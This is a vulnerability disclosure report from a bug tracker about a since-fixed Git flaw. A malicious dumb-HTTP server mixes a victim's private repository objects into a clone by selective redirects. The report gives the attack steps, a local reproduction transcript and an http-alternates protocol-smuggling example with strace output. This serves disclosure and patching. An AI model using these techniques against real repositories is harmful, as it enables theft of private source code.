New issue
Advanced search Search tips
Starred by 1 user
Status: Fixed
Owner:
Closed: Feb 2017
Cc:



Sign in to add a comment
Git: private repository theft by mixing repositories
Project Member Reported by jannh@google.com, Nov 10 2016 Back to list
This bug report assumes the following scenario:

 - A victim has access to a private git repository.
 - An attacker who knows the URL to the private repository wants to
   steal its contents.
 - The private git repository can be accessed over http or https.
 - The private git repository supports the dumb HTTP transport.
 - The victim authenticates to the private git repository either by source IP
   (imagine a git server in a company's internal network without explicit
   authentication) or has the credentials stored in a .netrc file.
 - To simplify the attack, it is assumed that the private git repository only
   contains one branch and no tags.
 - The attacker can convince the victim to pull a repository from the attacker's
   server, create a new commit in it and afterwards perform a push to the
   victim's server.
 - The victim retries fetching the attacker's repository if the first attempt
   fails.
 - I think packfiles on the server might block this attack.

The basic idea of the attack is:
Because in the dumb HTTP protocol, each object is fetched using a separate HTTP
request and git instructs curl to follow HTTP redirects, it is possible for a
server to "mix in" objects from another server during a fetch/clone operation by
selectively redirecting requests to the other server. If the user does not
inspect all subdirectories of the cloned repository and pushes the cloned
repository back to the internet, the mixed-in objects will be pushed as well.

More detailed steps of the attack:
1. When the user attempts to clone from the attacking server for the first time,
   forward all accesses to the victim server. This allows the attacker to
   observe object IDs from the repository (because they are sent in URLs).
   If there is only one branch, the first request for an object ID will be for
   the latest commit, the second one will be for the latest commit's tree.
   After the object ID of the tree has been observed, all requests that arrive
   within a short timeframe can be rejected with an HTTP response like
   "500 temporary error" or so.
   Now, since the victim tree's object ID is known, the attacker can construct a
   git repository in which some tree contains an entry pointing to the victim
   tree.
2. When the user retries the clone operation (or someone else in the same
   network does), the attacker responds to requests with files from his own
   repository. If a requested object doesn't exist, it is assumed that the
   object is present on the victim server, and a redirect is sent.
   After this step, the victim user should have a repository that contains the
   attacker-created tree, with the contents of the private git repository's tree
   hidden in some subdirectory. (A more sneaky way would be to hide the private
   repository's tree somewhere in the history, not under the head commit.)
3. If the user now pushes the contents of the cloned repository (perhaps after
   adding a few more commits or so), the pushed repository contains a copy of
   the private repository's tree.

An issue for the attacker is that git attempts to optimize away redirects by
emulating redirects locally if the redirect scheme looks predictable (in
update_url_from_redirect()). However, this can be worked around by appending a
dummy parameter to the URL, causing git to bail out of the optimization (the
"insane redirect scheme" case).


Reproduction instructions:

Prepare the private repository:

~$ mkdir -p tmp/gitmix/victim_repo
~$ cd tmp/gitmix/victim_repo
~/tmp/gitmix/victim_repo$ git init
Initialized empty Git repository in [...]/tmp/gitmix/victim_repo/.git/
~/tmp/gitmix/victim_repo$ echo 'this is secret!' > secret.txt
~/tmp/gitmix/victim_repo$ git add secret.txt
~/tmp/gitmix/victim_repo$ git commit -m'initial commit'
[master (root-commit) 9f73f5b] initial commit
 1 file changed, 1 insertion(+)
 create mode 100644 secret.txt
~/tmp/gitmix/victim_repo$ git update-server-info
~/tmp/gitmix/victim_repo$ cd .git/
~/tmp/gitmix/victim_repo/.git$ python -m SimpleHTTPServer 8001 .
Serving HTTP on 0.0.0.0 port 8001 ...


In a new tab, prepare the attacker's repository, where `forward.py` is the
attached file:

~$ mkdir tmp/gitmix/attacker_repo
~$ cd tmp/gitmix/attacker_repo
~/tmp/gitmix/attacker_repo$ git init
Initialized empty Git repository in [...]/tmp/gitmix/attacker_repo/.git/
~/tmp/gitmix/attacker_repo$ echo 'just a harmless repo' > harmless_file
~/tmp/gitmix/attacker_repo$ git add harmless_file
~/tmp/gitmix/attacker_repo$ git commit -m'initial commit'
[master (root-commit) 7e13ade] initial commit
 1 file changed, 1 insertion(+)
 create mode 100644 harmless_file
~/tmp/gitmix/attacker_repo$ git update-server-info
~/tmp/gitmix/attacker_repo$ python [...]/forward.py
serving at port 8000

Now, in another tab, as the victim user:

~$ cd tmp/gitmix/
~/tmp/gitmix$ git clone http://localhost:8000/
Cloning into 'localhost'...
error: The requested URL returned error: 500 temporary error, please try again (curl_result = 22, http_code = 500, sha1 = fc9f3b913607dc0fd2117a1b15e4a7c063c8b1e5)
error: Unable to find fc9f3b913607dc0fd2117a1b15e4a7c063c8b1e5 under http://localhost:8000
Cannot obtain needed tree fc9f3b913607dc0fd2117a1b15e4a7c063c8b1e5
while processing commit 9f73f5bade6cac025eb9bbc726fafe3cf878586c.
error: fetch failed.
~/tmp/gitmix$ # ensure at least 1s of delay here, then retry
~/tmp/gitmix$ git clone http://localhost:8000/
Cloning into 'localhost'...
Checking connectivity... done.
~/tmp/gitmix$ tree localhost/
localhost/
├── boring_subdir
│   └── secret.txt
└── harmless_file

1 directory, 2 files
~/tmp/gitmix$ cat localhost/harmless_file 
just a harmless repo
~/tmp/gitmix$ cat localhost/boring_subdir/secret.txt 
this is secret!

As you can see, the victim user indeed ends up with a repository that contains
a mix of data from the attacker's repository and from the private repository.
At this point, pushing to any repository will leak the contents of the private
repository.

To remove the restriction that the private repository must not have more than
one branch, a variation could be employed; for example, the attacker could store
the first observed object ID instead of the second one (thereby guaranteeing
that it belongs to a commit) and then rebase his whole history on top of that
commit ID.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a
broadly available patch, then the bug report will automatically become visible
to the public.
 
forward.py
3.0 KB View Download
Project Member Comment 1 by jannh@google.com, Nov 11 2016
The description of the scenario is wrong: "The attacker can convince the victim to [...] and afterwards perform a push to the victim's server." should be "The attacker can convince the victim to [...] and afterwards perform a push to the attacker's server.".
Project Member Comment 2 by jannh@google.com, Nov 14 2016
I found the following related issues and also reported them to Git:

============
Unfortunately, when I reported these issues, I had not yet looked at the
http-alternates mechanism. That mechanism explicitly permits mixing
objects from remote servers in, as an explicit feature. So while patch 2/4
should still do its job, I think at least the part of patch 4/4 where redirects
are blocked can be circumvented using alternates - and fixing that
would, as far as I can tell, require a breaking change that requires opt-in
before remote alternates can be used. :/

Can you do a breaking change for this and require explicit opt-in (either
by the user or by the server whose objects are mixed in, e.g. by requiring
that /objects/info/http-alternate-target is present on the target server or
something like that)? I realize that, for people who actually rely on
http-alternates, this would be quite an annoyance. :/


More importantly, there is a separate issue with alternates: The code for
handling the "http-alternates" file does not perform any checks on the
protocols of supplied URLs as long as they contain something like "://".
Because, when alternates are used, the redirect doesn't happen inside
curl, but instead happens in git, CURLOPT_REDIR_PROTOCOLS has
no effect, and all the protocols libcurl supports can be used. These
protocols are, quoting from the curl homepage, "DICT, FILE, FTP,
FTPS, Gopher, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3,
POP3S, RTMP, RTSP, SCP, SFTP, SMB, SMTP, SMTPS, Telnet and
TFTP" (although some distros, like Debian, omit e.g. scp and sftp
support - you can check for that with "curl --version").

So for example, when you clone from an http remote that serves an
"http-alternates" file with content
"smtp://127.123.123.123///////////////////blaz" and replies to a request
for some object with a 404 status code, this happens:

$ strace -f git clone http://localhost:8080 2>&1 | grep 'connect(.*123.123'
[pid 147453] connect(4, {sa_family=AF_INET, sin_port=htons(25),
sin_addr=inet_addr("127.123.123.123")}, 16) = -1 EINPROGRESS
(Operation now in progress)
[pid 147453] connect(3, {sa_family=AF_INET, sin_port=htons(25),
sin_addr=inet_addr("127.123.123.123")}, 16) = -1 EINPROGRESS
(Operation now in progress)

As you can see, git tries to create an SMTP connection (port 25).

(To reproduce, create a git repository, make a commit, prepare the
repo for dumb HTTP cloning, delete a random object from the
repository, create the http-alternates file, launch an HTTP server that
serves from the repo directory and clone from it.)

The file:/// protocol also works, so that allows you to mix in objects from
the developer's local filesystem, which I think might actually be worse
than being able to pull in objects from http(s) servers.

So I think you should set CURLOPT_PROTOCOLS and/or filter
the protocol name.
============

Jeff King from Git's security group pointed out that, on recent git versions, this doesn't permit grabbing objects from arbitrary normal local repositories via file://, apparently because of commit 17966c0a63d2 (from July 2016), but it probably still works on many distros.


Jeff King has already prepared comprehensive fixes for all of the issues I've reported. I've looked at them and tested them, and apart from some minor things, they look good.
Project Member Comment 3 by jannh@google.com, Dec 1 2016
Patches are now public (but haven't landed yet): http://marc.info/?l=git&m=148058312026060&w=2

The interesting patches, with nice explanations of the individual issues:
http://marc.info/?l=git&m=148058310126056&w=2 [PATCH 2/6] http: always update the base URL for redirects
http://marc.info/?l=git&m=148058349726174&w=2 [PATCH 4/6] http: make redirects more obvious
http://marc.info/?l=git&m=148058351226181&w=2 [PATCH 5/6] http: treat http-alternates like redirects
Project Member Comment 4 by jannh@google.com, Feb 7 2017
Labels: -Restrict-View-Commit
Status: Fixed
Release 2.11.1 contains the fixes and was released 2017-02-02.
Sign in to add a comment